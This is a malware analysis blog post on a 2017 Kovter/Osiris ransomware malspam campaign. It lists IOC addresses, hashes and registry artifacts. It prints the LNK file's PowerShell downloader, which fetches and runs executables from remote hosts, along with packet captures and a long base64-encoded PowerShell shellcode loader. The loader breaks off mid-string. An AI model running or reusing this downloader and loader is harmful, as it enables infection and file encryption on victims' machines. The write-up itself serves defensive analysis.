2017-02-06 Kovter/Osiris UPS Malspam

Packet Analysis

A little late for this write-up, but here is an example of some Kovter/Osiris malspam that I was able to find from late last week. While researching some of the URLs below I came across My Online Security’s blog post which had the domains listed below. It looks as if they have been keeping tabs on these types of emails and the callbacks used as well.

All artifacts from this investigation can be found in this Github repo located here.

The attack is a simple one; phishing emails sent to users suggesting that the person has a UPS shipment that has been shipped, or not delivered which then prompts them to act. The attachment being sent is a zip file, that once unzipped, is really LNK file which is made to look like a Word document. The attack is using the route of hiding the LNK file extension since the OS is only showing the DOC extension. Also within the shortcut text box there is some Powershell code as seen in the image below. Microsoft has an article talking about this attack vector which can be found here and an updated article talking about the Kovter infection here. All of this ends with the system being encrypted with Osiris.


*Indicators of Compromise:*
50[.]62[.]238[.]1 / helpdeskng[.]com
194[.]31[.]59[.]5
128[.]1[.]191[.]207
104[.]247[.]149[.]240
48[.]176[.]164[.]247 (Port 8080)
28[.]194[.]116[.]44 (Port 8080)
193[.]75[.]133[.]172 (Port 8080)
77[.]44[.]38[.]70 (Port 8080)
60[.]193[.]66[.]163 (Port 8080)
72[.]64[.]109[.]208 (Port 8080)
14[.]47[.]201[.]123 (Port 8080)
74[.]220[.]211[.]62
189[.]177[.]220[.]156
38[.]123[.]253[.]210 (HTTPS)
128[.]1[.]191[.]207
38[.]123[.]253[.]210
40[.]135[.]7[.]195 (Port 8080)
40[.]213[.]139[.]241 (Port 8080)
131[.]168[.]180[.]20 (Port 8080)
39[.]205[.]100[.]112 (Port 8080)
97[.]167[.]78[.]47 (Port 8080)
21[.]69[.]102[.]34 (Port 8080)
28[.]246[.]201[.]182 (Port 8080)
169[.]6[.]96[.]39 (Port 8080)
83[.]102[.]201[.]113 (Port 8080)
143[.]152[.]100[.]215 (Port 8080)

*Artifacts:*
File name: a1.exe
File size: 380KB
MD5 hash: fbe08cc20207d5c4f61757484568b9b0
Virustotal: http://www.virustotal.com/en/file/bd9a3d09c31a034a9434a5f182624b70e418ed4421ee991069d3b47a156bd6ba/analysis/
First submitted: 2017-02-03 00:46:14 UTC
Detection ratio: 18 / 56

File name: a2.exe
File size: 340KB
MD5 hash: f503802c3399f2f58c9a9fdeaffdd1f6
Virustotal: NA

File name: c3046d01.e5782001b
File size: 6KB
MD5 hash: 85445dde7246db5feef9f853c7aa05e1
Virustotal: NA

File name: e7da1628.bat
File size: 77B
MD5 hash: 65ab194835a57961575c64996f91e8c3
Virustotal: NA

*Analysis of malware*
Starting from the system perspective, when executing the malicious LNK file which has the following Powershell code:

"C:\Windows\System32\WindowsPowerShell\v1[.]0\powershell[.]exe" -ExecutionPolicy ByPass -NoProfile -command $ll='helpdeskng[.]com','custommaidbooks[.]com';function g($f){Start $f;};function z{return New-Object System[.]Net[.]WebClient;};$ld=0;$cs=[char]92;$fn=$env:temp+$cs;$dc=$fn+'a[.]doc';$c='';$q=New-Object System[.]Random;if(!(Test-Path $dc)){for($i=0;$i -lt 2000;$i++){$c=$c+[char]$q[.]Next(1,255);};$c | Out-File -FilePath $dc;};g($dc);$lk=$fn+'a[.]txt';$y=z;if(!(Test-Path $lk)){New-Item -Path $fn -Name 'a[.]txt' -ItemType File;for($n=1;$n -le 2;$n++){$f=$fn+'a'+$n+'[.]exe';$r='/counter/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b'+$n;for($i=$ld;$i -lt $ll[.]length;$i++){$u=$ll[$i]+$r;$u='http://'+$u;$y[.]DownloadFile($u,$f);if(Test-Path $f){$v=Get-Item $f;if($v[.]length -gt 10000){$ld=$i;g($f);break;};};};};};notepad[.]exe

it is what downloads the two files called “a1.exe” and “a2.exe” since the code references the URI of “‘/counter/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b’+$n” which looks to be in a loop, along with the code of “$f=$fn+’a’+$n+’.exe’;” giving the files their names once downloaded. This can also be seen in the PCAP:

GET /counter/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b1 HTTP/1.1
Host: helpdeskng[.]com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Fri, 03 Feb 2017 08:49:35 GMT
Server: Apache
Content-Disposition: attachment; filename=f5.png
Content-Length: 379904
Cache-Control: max-age=5184000
Expires: Tue, 04 Apr 2017 08:49:35 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png

MZ......................@.............................................	.!..L.!This program cannot be run in DOS mode.

-----

GET /counter/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b2 HTTP/1.1
Host: helpdeskng[.]com

HTTP/1.1 200 OK
Date: Fri, 03 Feb 2017 08:49:36 GMT
Server: Apache
Content-Disposition: attachment; filename=868d.png
Content-Length: 339777
Cache-Control: max-age=5184000
Expires: Tue, 04 Apr 2017 08:49:36 GMT
Content-Type: image/png

MZ......................@.............................................	.!..L.!This program cannot be run in DOS mode.

During this time Word is opened up as well, but there does not seem to be anything malicious with it from what I can see.

Once these files have been downloaded to the system, the “a1.exe” file is kicked off first and starts looking at different registry keys and file locations on the system and then shortly thereafter the “a2.exe” process is started and proceeds to look at different things within the registry and in the file system while setting registry values. For example:

HKCU\Software\7GWsaAe\GsDyqtU6qn
Type:	REG_SZ
Length:	892,566
Data:	¿ËÍIBœþ†‚‘Ï«Öo‡©¸uŸ·PX¬¡1z#B2|C¤%ܳ$¼_Îd·›áþ׸?¶­ þÁ£M|Þ|l˜™'ŒEÒ÷âÀaçrPhFc¶Ušes³U‹YÌLAp¼@Œw>PUpVæÿ3é¿QÑ9-2JÁ9¨7ßšõW{Yøå4sÜ×è,›ÍЧÎU”LŸåÔC¼fwÚáQ¡þŠÍ«®3™†ËL

-----

Path: HKCU\Software\7GWsaAe\xBQlLx
Type:	REG_SZ
Length:	106,344
Data:	aZTXBoMIgZLfYPVj5NGKkBK="nYs38HRYT745axjeErGZ1";hrAOzPmKYqnW2QUxKmF="VCl6jqYtdcCslBoDb";vJVb1JPhBOyMqrWmJRBx="DCRdConVe2Huod7tA2jpIUxuXkbVFnXQBoYfdWXgoVQy";Fd8B="151E591E534F161E100F37672E411E37731F003D1F4A6B053D4A2801217110755E3B7D24183E75173C7A452628713F0278781F661232640E2505163E5B15720F315E3C6B7E751257290316173223321B2D173F2E20042443040C5169097C005B252B77306C510A11204B587E66017406010E0F1F04342D767E76005A193B2B022E5C5B1F1F41322062027A436F0D19132C041F0A18190D0A2008283D0607521A1901130B5E7B6C7028290C371E3877315215625A15233C1333022042001E7116106606017922361F1725150230530D1A0A250A4F771D36205F0106781E0E7C06283A1330033539252A3056644C0E360C6F21116C3F6C1E3E7F4F446B6001061B3310210F740B0B730A7C3D383C0E1523172B5A372D0C314C5D74146F631D143C147C0D0A003707653B0068253D4D387D484D271B2E07122E3D372C41390C107A2C7B3D25736E2628070916197D142A122A034A621F17105D1657142B173A0C7F5055011C78720C7B1E7009180D4B1F280A1D252F1A3F193B137D781B5C320F1E1B1C7534062F62000021521C08711B6432003B34222965683D095E5E343C34180A4005080D032C161839651C3E0C69l

-----

Path: HKLM\SOFTWARE\Wow6432Node\lqoiarkklq\lapxjqc
Type:	REG_SZ
Length:	910,252
Data:	$1W=ÅåŸû>Å@ÐöB8½ƒ¯¯ØehÂp9Ñ:çîËçý„Ž]:ÜÜh

-----

Path: HKCU\Software\lqoiarkklq\txpge
Type:	REG_SZ
Length:	104,872
Data:	JZroJd2gxMbrSBTJpvmp="CfcD7gwy0RQtl396CbCG9ydLoE";YFzuPrDl1WIVPNuoFtEFHuBL="sVAFCJ4pbaOR0g9zsiLtZ4JFnIrTZ4HPXIfB99Oll";KZcwv8urWPpecoi2MAAU="HOWjlqH30Ja5Hy5S6djKoTme43AMVgwQOh4bn82RI3tEP9Q";dISBmzqXpuqXEiT0Yx="vB6EXz5fPclmVDTCwBRTYyglpTHZNSns88saBbp4H";O4oUMKfohXdbFHOHluMs7v="NiKtr4ds0JP7rDokSjaYH32SKl1ud8a02J";nRvfucl0mnbmtVCoYKkLaCv="KsfhOr8tfAOhUEjDdI8Pv75noMhmbMSBTITAIyGbnze";WWzxToRttSpb7OJXj7FhRf="Nbd8efU5ArtYWp4ulpRDrGUJzinSWVVz096QrMT4mWLwL";PLyiIuCPJovOeDLujY4LeMe="e5te7kFWHrvPAWF0dVNqNmTBcY1YPzRJvlxNsoz7hA3AaJ";VEc1="317B3C38735B2E2F013565301C12094B0E231B39270A7B0F0F061E1F742F1176652349571D1E553662612C7E7E392C3703060218300F66533F3A101D006045693130203039173106491D14357505117D3D204F183E1D6E5B3B1338303207015A0622074E102A10271E297B2B70755B1C3952503127051C2531703D2439091C1E2C212713196006715A3E201425101C3114333B150B3A15130C383C210E001D13762928240230651014132C7A675920280A4C34231036051F1960637E0065570855474D4C2831322F362621017A7B69527D4101073B7F45212C2647131620130110193D371B0139056D571E621B065C181E4B0011320l

At this time I can not be for certain what the purpose of each of these files are, and if their purpose is completely different or if they have aspects of overlap to them. The only thing that is apparent to me at this time is the fact that the a1.exe process is the main process that encrypts the files on the system, where the a2.exe process is not handling the encryption and seems to be handling the persistence part of this infection.

The Powershell script also kicks off two other processes (both are regsvr32.exe) which is used to create persistence on the now infected system via some registry keys and on the file system, but to also keep an open connection to the C2 systems.

The interesting thing about one of these regsvr32.exe processes (PID 612) is that there is the following block of code that has been base64 encoded when the process is started from it’s parent:

APPDATA=C:\Users\Administrator\AppData\Roaming
	aykqh=iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('I2F2b2Jtc2p2dWNqdW9jeHVua2FqdXZvZ2liZGNta2VxcA0Kc2xlZXAoMTUpO3RyeXsNCiN3cWR5bw0KZnVuY3Rpb24gZ2RlbGVnYXRlew0KI2ZkZmZmZXBxb28NClBhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1R5cGVbXV0gJFBhcmFtZXRlcnMsW1BhcmFtZXRlcihQb3NpdGlvbj0xKV0gW1R5cGVdICRSZXR1cm5UeXBlPVtWb2lkXSk7DQojZ2t0ZnJiag0KJFR5cGVCdWlsZGVyPVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkRlZmluZUR5bmFtaWNBc3NlbWJseSgoTmV3LU9iamVjdCBTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseU5hbWUoIlJlZmxlY3RlZERlbGVnYXRlIikpLFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikuRGVmaW5lRHluYW1pY01vZHVsZSgiSW5NZW1vcnlNb2R1bGUiLCRmYWxzZSkuRGVmaW5lVHlwZSgiWFhYIiwiQ2xhc3MsUHVibGljLFNlYWxlZCxBbnNpQ2xhc3MsQXV0b0NsYXNzIixbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSk7DQojbndia2NpDQokVHlwZUJ1aWxkZXIuRGVmaW5lQ29uc3RydWN0b3IoIlJUU3BlY2lhbE5hbWUsSGlkZUJ5U2lnLFB1YmxpYyIsW1N5c3RlbS5SZWZsZWN0aW9uLkNhbGxpbmdDb252ZW50aW9uc106OlN0YW5kYXJkLCRQYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCJSdW50aW1lLE1hbmFnZWQiKTsNCiN0aGxyDQokVHlwZUJ1aWxkZXIuRGVmaW5lTWV0aG9kKCJJbnZva2UiLCJQdWJsaWMsSGlkZUJ5U2lnLE5ld1Nsb3QsVmlydHVhbCIsJFJldHVyblR5cGUsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOw0KI2N4eXd6ZmwNCnJldHVybiAkVHlwZUJ1aWxkZXIuQ3JlYXRlVHlwZSgpO30NCiNhbGtmcHlpanFsDQpmdW5jdGlvbiBncHJvY3sNCiNta2xlbGRzZmNsDQpQYXJhbSAoW1BhcmFtZXRlcihQb3NpdGlvbj0wLE1hbmRhdG9yeT0kVHJ1ZSldIFtTdHJpbmddICRNb2R1bGUsW1BhcmFtZXRlcihQb3NpdGlvbj0xLE1hbmRhdG9yeT0kVHJ1ZSldIFtTdHJpbmddICRQcm9jZWR1cmUpOw0KI2JwbmllDQokU3lzdGVtQXNzZW1ibHk9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uR2V0QXNzZW1ibGllcygpfFdoZXJlLU9iamVjdHskXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlwiKVstMV0uRXF1YWxzKCJTeXN0ZW0uZGxsIil9Ow0KI3Zkem5pZ2sNCiRVbnNhZmVOYXRpdmVNZXRob2RzPSRTeXN0ZW1Bc3NlbWJseS5HZXRUeXBlKCJNaWNyb3NvZnQuV2luMzIuVW5zYWZlTmF0aXZlTWV0aG9kcyIpOw0KI2p1dHZiaXcNCnJldHVybiAkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldFByb2NBZGRyZXNzIikuSW52b2tlKCRudWxsLEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWZdKE5ldy1PYmplY3QgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZigoTmV3LU9iamVjdCBJbnRQdHIpLCRVbnNhZmVOYXRpdmVNZXRob2RzLkdldE1ldGhvZCgiR2V0TW9kdWxlSGFuZGxlIikuSW52b2tlKCRudWxsLEAoJE1vZHVsZSkpKSksJFByb2NlZHVyZSkpO30NCiNpY2Vib2ZuYw0KW0J5dGVbXV0gJHNjMzIgPSAweDU1LDwjcnByIz4weDhCLDB4RUMsPCNqaSM+MHg4MSwweEM0LDB4MDAsMHhGQSwweEZGLDB4RkYsMHg1MywweDU2LDB4NTcsMHg1MywweDU2LDB4NTcsMHhGQywweDMxLDB4RDIsMHg2NCwweDhCLDwjYXR3Iz4weDUyLDB4MzAsMHg4QiwweDUyLDwjYmVwIz4weDBDLDB4OEIsMHg1MiwweDE0LDB4OEIsMHg3MiwweDI4LDB4NkEsMHgxOCwweDU5LDB4MzEsMHhGRiwweDMxLDB4QzAsPCNjY2QjPjB4QUMsMHgzQywweDYxLDB4N0MsMHgwMiwweDJDLDB4MjAsMHhDMSwweENGLDB4MEQsMHgwMSwweEM3LDB4RTIsMHhGMCwweDgxLDB4RkYsMHg1QiwweEJDLDB4NEEsMHg2QSwweDhCLDB4NUEsMHgxMCwweDhCLDB4MTIsMHg3NSwweERCLDB4ODksPCNybyM+MHg1RCwweEZDLDwjc2MjPjB4NUYsMHg1RSwweDVCLDB4OEIsMHg0NSwweEZDLDB4ODksMHg0NSwweEQ0LDB4OEIsMHg0NSwweEQ0LDB4NjYsMHg4MSwweDM4LDB4NEQsMHg1QSwweDBGLDB4ODUsMHgwRiw8I2N3Iz4weDAyLDB4MDAsMHgwMCwweDhCLDB4NDUsMHhGQywweDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsPCNscGojPjB4NDUsMHhENCwweDhCLDB4NDAsMHgzQywweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDB4MDQsMHg4MywweEM0LDB4MDgsMHg4OSwweDQ1LDB4RDAsMHg4QiwweDQ1LDB4RDAsMHg4MSwweDM4LDB4NTAsMHg0NSwweDAwLDB4MDAsMHgwRiwweDg1LDB4RTUsMHgwMSwweDAwLDB4MDAsMHg4QiwweDQ1LDB4RDAsPCNxa3EjPjB4OEIsMHg0MCwweDc4LDB4MDMsMHg0NSwweEZDLDB4ODksMHg0NSwweENDLDB4OEIsMHg0NSwweENDLDB4OEIsMHg0MCwweDE4LDB4ODUsMHhDMCwweDBGLDwjYXQjPjB4OEMsMHhDQiwweDAxLDB4MDAsMHgwMCwweDQwLDB4ODksMHg4NSw8I254ZyM+MHgzQywweEZGLDB4RkYsMHhGRiwweDMzLDB4RjYsMHg4QiwweDQ1LDB4RkMsMHgzMywweEQyLDB4NTIsMHg1MCwweDhCLDB4NDUsMHhDQywweDhCLDB4NDAsMHgyMCwweDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsMHhDNiwweEMxLDB4RTAsMHgwMiwweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDB4MDQsMHg4MywweEM0LDB4MDgsMHgwMywweDA0LDB4MjQsMHgxMywweDU0LDB4MjQsPCNsY2IjPjB4MDQsMHg4MywweEM0LDB4MDgsMHg4QiwweDA4LDB4MDMsMHg0RCwweEZDLDB4ODEsMHgzOSwweDRDLDB4NkYsMHg2MSwweDY0LDB4NzUsMHg1NiwweDhELDB4NDEsMHgwNCwweDgxLDB4MzgsMHg0Qyw8I29sciM+MHg2OSwweDYyLDB4NzIsMHg3NSwweDRCLDB4OEQsMHg0MSwweDA4LDB4ODEsMHgzOCwweDYxLDB4NzIsMHg3OSwweDQxLDwjbmEjPjB4NzUsMHg0MCwweDhELDB4NDEsMHgwQywweDgwLDB4MzgsMHgwMCwweDc1LDB4MzgsMHg4QiwweDQ1LDB4Q0MsMHg4QiwweDQwLDB4MjQsMHgwMywweDQ1LDB4RkMsMHgzMywweEQyLDB4NTIsMHg1MCwweDhCLDB4QzYsMHgwMywweEMwLDB4OTksMHgwMywweDA0LDB4MjQsMHgxMywweDU0LDB4MjQsMHgwNCwweDgzLDB4QzQsMHgwOCwweDY2LDwjeHRnIz4weDhCLDB4MDAsMHg4QiwweDU1LDB4Q0MsPCNpZ2UjPjB4OEIsMHg1MiwweDFDLDB4MDMsMHg1NSwweEZDLDB4MEYsMHhCNywweEMwLDB4QzEsMHhFMCwweDAyLDB4MDMsMHhEMCwweDhCLDB4MDIsMHgwMywweDQ1LDB4RkMsMHg4OSwweDQ1LDB4QkMsPCN1c3IjPjB4ODEsMHgzOSwweDQ3LDB4NjUsMHg3NCwweDUwLDwjbmZ6Iz4weDc1LDB4NTYsMHg4RCwweDQxLDB4MDQsMHg4MSwweDM4LDwjY3AjPjB4NzIsMHg2RiwweDYzLDB4NDEsMHg3NSwweDRCLDB4OEQsMHg0MSwweDA4LDB4ODEsMHgzOCw8I2pvIz4weDY0LDB4NjQsMHg3MiwweDY1LDB4NzUsMHg0MCwweDhELDB4NDEsMHgwRSwweDgwLDB4MzgsMHgwMCw8I3NicyM+MHg3NSwweDM4LDB4OEIsPCNhYyM+MHg0NSwweENDLDB4OEIsMHg0MCwweDI0LDB4MDMsMHg0NSwweEZDLDB4MzMsMHhEMiw8I2RkIz4weDUyLDB4NTAsMHg4QiwweEM2LDB4MDMsMHhDMCwweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDB4MDQsMHg4MywweEM0LDB4MDgsMHg2NiwweDhCLDB4MDAsPCN2dWUjPjB4OEIsMHg1NSwweENDLDB4OEIsMHg1MiwweDFDLDB4MDMsMHg1NSwweEZDLDB4MEYsMHhCNywweEMwLDB4QzEsMHhFMCw8I2x4Iz4weDAyLDB4MDMsPCNwaGEjPjB4RDAsMHg4Qiw8I3N0Iz4weDAyLDB4MDMsMHg0NSwweEZDLDB4ODksMHg0NSwweEI4LDwjb2FpIz4weDgxLDB4MzksMHg1NiwweDY5LDB4NzIsMHg3NCwweDc1LDB4NTYsMHg4RCwweDQxLDB4MDQsMHg4MSwweDM4LDB4NzUsMHg2MSwweDZDLDB4NDEsMHg3NSwweDRCLDB4OEQsMHg0MSwweDA4LDB4ODEsPCN1bXMjPjB4MzgsPCN2enojPjB4NkMsMHg2QywweDZGLDB4NjMsMHg3NSwweDQwLDB4OEQsPCN1dSM+MHg0MSwweDBDLDB4ODAsMHgzOCwweDAwLDB4NzUsMHgzOCwweDhCLDB4NDUsMHhDQywweDhCLDB4NDAsMHgyNCwweDAzLDB4NDUsPCNqcHgjPjB4RkMsMHgzMywweEQyLDB4NTIsMHg1MCwweDhCLDB4QzYsMHgwMywweEMwLDB4OTksMHgwMywweDA0LDB4MjQsMHgxMywweDU0LDB4MjQsMHgwNCwweDgzLDB4QzQsMHgwOCwweDY2LDB4OEIsMHgwMCwweDhCLDB4NTUsMHhDQywweDhCLDB4NTIsMHgxQywweDAzLDB4NTUsMHhGQywweDBGLDB4QjcsMHhDMCwweEMxLDB4RTAsMHgwMiwweDAzLDB4RDAsMHg4QiwweDAyLDB4MDMsMHg0NSwweEZDLDB4ODksMHg0NSw8I3N4cyM+MHhBOCwweDgxLDB4MzksPCNrZGsjPjB4NDUsMHg3OCwweDY5LDB4NzQsMHg3NSwweDYzLDB4OEQsMHg0MSwweDA0LDwjaXdqIz4weDgxLDwjd255Iz4weDM4LDB4NTAsMHg3MiwweDZGLDB4NjMsMHg3NSwweDU4LDB4OEQsPCNtcGwjPjB4NDEsMHgwOCwweDgwLDB4MzgsMHg2NSwweDc1LDB4NTAsMHg4RCwweDQxLDB4MDksMHg4MCwweDM4LDB4NzMsMHg3NSwweDQ4LDB4OEQsMHg0MSwweDBBLDB4ODAsMHgzOCwweDczLDB4NzUsMHg0MCwweDgzLDB4QzEsMHgwQiw8I2VvIz4weDgwLDB4MzksMHgwMCwweDc1LDB4MzgsMHg4QiwweDQ1LDB4Q0MsMHg4QiwweDQwLDB4MjQsMHgwMywweDQ1LDB4RkMsMHgzMywweEQyLDB4NTIsMHg1MCwweDhCLDB4QzYsPCN4engjPjB4MDMsMHhDMCwweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDwjYngjPjB4MDQsMHg4MywweEM0LDB4MDgsMHg2NiwweDhCLDB4MDAsMHg4QiwweDU1LDB4Q0MsMHg4QiwweDUyLDB4MUMsMHgwMywweDU1LDwjbWV5Iz4weEZDLDB4MEYsMHhCNywweEMwLDB4QzEsMHhFMCwweDAyLDwjZWJoIz4weDAzLDB4RDAsPCNxeWwjPjB4OEIsMHgwMiwweDAzLDB4NDUsMHhGQywweDg5LDB4NDUsMHhBNCwweDQ2LDB4RkYsMHg4RCwweDNDLDB4RkYsMHhGRiwweEZGLDwjZG5pIz4weDBGLDB4ODUsMHgzRSwweEZFLDB4RkYsMHhGRiw8I3FuIz4weEM2LDB4ODUsMHgyRiwweEZGLDB4RkYsMHhGRiwweDYxLDB4QzYsMHg4NSwweDMwLDB4RkYsMHhGRiwweEZGLDB4NjQsMHhDNiwweDg1LDB4MzEsMHhGRiwweEZGLDB4RkYsMHg3NiwweEM2LDB4ODUsMHgzMiwweEZGLDB4RkYsMHhGRiwweDYxLDB4QzYsMHg4NSwweDMzLDB4RkYsMHhGRiwweEZGLDB4NzAsMHhDNiwweDg1LDB4MzQsMHhGRiwweEZGLDB4RkYsMHg2OSwweEM2LDB4ODUsMHgzNSwweEZGLDB4RkYsMHhGRiwweDMzLDB4QzYsMHg4NSw8I216ZiM+MHgzNiwweEZGLDB4RkYsMHhGRiwweDMyLDwjbGQjPjB4QzYsMHg4NSwweDM3LDB4RkYsMHhGRiwweEZGLDB4MkUsMHhDNiwweDg1LDB4MzgsMHhGRiwweEZGLDB4RkYsMHg2NCwweEM2LDB4ODUsMHgzOSwweEZGLDB4RkYsMHhGRiwweDZDLDB4QzYsMHg4NSwweDNBLDB4RkYsPCNsYnIjPjB4RkYsMHhGRiwweDZDLDwjcHUjPjB4QzYsMHg4NSwweDNCLDB4RkYsMHhGRiwweEZGLDB4MDAsMHg4RCwweDg1LDB4MkYsMHhGRiwweEZGLDB4RkYsMHg1MCwweEZGLDB4NTUsMHhCQywweDhCLDB4RDgsMHg4NSwweERCLDB4NzUsMHgwNSwweDZBLDB4MDAsMHhGRiwweDU1LDB4QTQsMHg4OSwweDVELDB4RDQsMHg4QiwweDQ1LDB4RDQsMHg2NiwweDgxLDB4MzgsMHg0RCwweDVBLDB4MEYsMHg4NSwweDRGLDB4MDEsMHgwMCwweDAwLDB4OEIsMHhDMywweDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsMHg0NSwweEQ0LDB4OEIsMHg0MCwweDNDLDB4OTksMHgwMywweDA0LDB4MjQsMHgxMywweDU0LDB4MjQsMHgwNCwweDgzLDB4QzQsMHgwOCwweDg5LDB4NDUsMHhEMCwweDhCLDB4NDUsMHhEMCwweDgxLDB4MzgsMHg1MCwweDQ1LDB4MDAsMHgwMCwweDBGLDB4ODUsMHgyNiwweDAxLDB4MDAsMHgwMCwweDhCLDB4NDUsMHhEMCwweDhCLDB4NDAsMHg3OCwweDAzLDB4QzMsMHg4OSwweDQ1LDB4Q0MsMHg4QiwweDQ1LDB4Q0MsMHg4QiwweDQwLDB4MTgsMHg4NSwweEMwLDB4MEYsMHg4QywweDBELDB4MDEsMHgwMCwweDAwLDB4NDAsMHg4OSwweDg1LDB4M0MsMHhGRiwweEZGLDB4RkYsMHgzMywweEY2LDB4OEIsMHhDMyw8I3RoIz4weDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsMHg0NSwweENDLDB4OEIsMHg0MCwweDIwLDwja3NrIz4weDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsMHhDNiwweEMxLDB4RTAsMHgwMiwweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDwjdWF6Iz4weDA0LDB4ODMsMHhDNCwweDA4LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDB4MDQsMHg4MywweEM0LDB4MDgsMHg4QiwweDA4LDB4MDMsMHhDQiwweDgxLDB4MzksMHg1MiwweDY1LDB4NjcsMHg0RiwweDc1LDB4NUIsMHg4RCwweDQxLDB4MDQsMHg4MSwweDM4LDB4NzAsMHg2NSwweDZFLDB4NEIsMHg3NSwweDUwLDB4OEQsMHg0MSwweDA4LDB4ODEsMHgzOCwweDY1LDB4NzksMHg0NSwweDc4LDB4NzUsMHg0NSwweDhELDB4NDEsMHgwQywweDgwLDB4MzgsMHg0MSwweDc1LDB4M0QsMHg4RCwweDQxLDB4MEQsMHg4MCwweDM4LDB4MDAsMHg3NSwweDM1LDwjdHgjPjB4OEIsMHg0NSwweENDLDB4OEIsMHg0MCwweDI0LDB4MDMsMHhDMywweDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsMHhDNiwweDAzLDB4QzAsMHg5OSwweDAzLDB4MDQsMHgyNCwweDEzLDB4NTQsMHgyNCwweDA0LDB4ODMsMHhDNCwweDA4LDB4NjYsMHg4QiwweDAwLDB4OEIsMHg1NSwweENDLDB4OEIsMHg1MiwweDFDLDB4MDMsMHhEMywweDBGLDB4QjcsMHhDMCwweEMxLDB4RTAsMHgwMiwweDAzLDB4RDAsMHg4QiwweDAyLDB4MDMsMHhDMywweDg5LDB4NDUsMHhCMCwweDgxLDB4MzksMHg1MiwweDY1LDB4NjcsMHg1MSwweDc1LDB4NUUsMHg4RCw8I25pdSM+MHg0MSwweDA0LDB4ODEsMHgzOCw8I2prIz4weDc1LDB4NjUsMHg3Miw8I2xxIz4weDc5LDB4NzUsMHg1MywweDhELDB4NDEsMHgwOCwweDgxLDB4MzgsMHg1NiwweDYxLDB4NkMsMHg3NSwweDc1LDB4NDgsMHg4RCwweDQxLDB4MEMsMHg4MSwweDM4LDB4NjUsMHg0NSwweDc4LDB4NDEsMHg3NSwweDNELDB4ODMsMHhDMSw8I3lxZiM+MHgxMCwweDgwLDB4MzksMHgwMCwweDc1LDwjdG4jPjB4MzUsMHg4QiwweDQ1LDB4Q0MsMHg4QiwweDQwLDB4MjQsMHgwMywweEMzLDB4MzMsMHhEMiwweDUyLDB4NTAsMHg4QiwweEM2LDB4MDMsMHhDMCwweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDB4MDQsMHg4MywweEM0LDB4MDgsMHg2NiwweDhCLDB4MDAsMHg4QiwweDU1LDB4Q0MsMHg4QiwweDUyLDB4MUMsMHgwMywweEQzLDB4MEYsMHhCNywweEMwLDB4QzEsPCN3dG4jPjB4RTAsMHgwMiwweDAzLDB4RDAsMHg4QiwweDAyLDB4MDMsPCN2dCM+MHhDMywweDg5LDwjaG5lIz4weDQ1LDB4QUMsMHg0Niw8I21lbiM+MHhGRiwweDhELDB4M0MsMHhGRiwweEZGLDB4RkYsMHgwRiwweDg1LDB4RkMsPCNja3ojPjB4RkUsMHhGRiwweEZGLDB4OEIsMHg0NSwweDA4LDB4MDUsMHg0OCwweDBBLDB4MDAsMHgwMCwweDg5LDB4ODUsMHg3QywweEZGLDB4RkYsMHhGRiw8I2lrcSM+MHg4QiwweDg1LDB4N0MsMHhGRiwweEZGLDB4RkYsMHgwNSwweEU0LDB4MDAsMHgwMCw8I3FldiM+MHgwMCwweDg5LDwjeHNiIz4weDg1LDB4NzgsMHhGRiwweEZGLDB4RkYsMHgzMywweERCLDB4MzMsMHhDMCwweDg5LDB4ODUsMHg2NCw8I2FvIz4weEZGLDB4RkYsMHhGRiwweDMzLDB4QzAsMHg4OSwweDg1LDB4NjAsMHhGRiwweEZGLDB4RkYsMHg4RCwweDg1LDB4NzAsMHhGRiwweEZGLDB4RkYsMHg1MCwweDZBLDB4MDEsMHg2QSwweDAwLDB4OEIsMHg4NSwweDdDLDB4RkYsMHhGRiwweEZGLDB4NTAsMHg2OCwweDAyLDB4MDAsMHgwMCwweDgwLDB4RkYsMHg1NSwweEIwLDB4ODUsMHhDMCwweDBGLDB4OD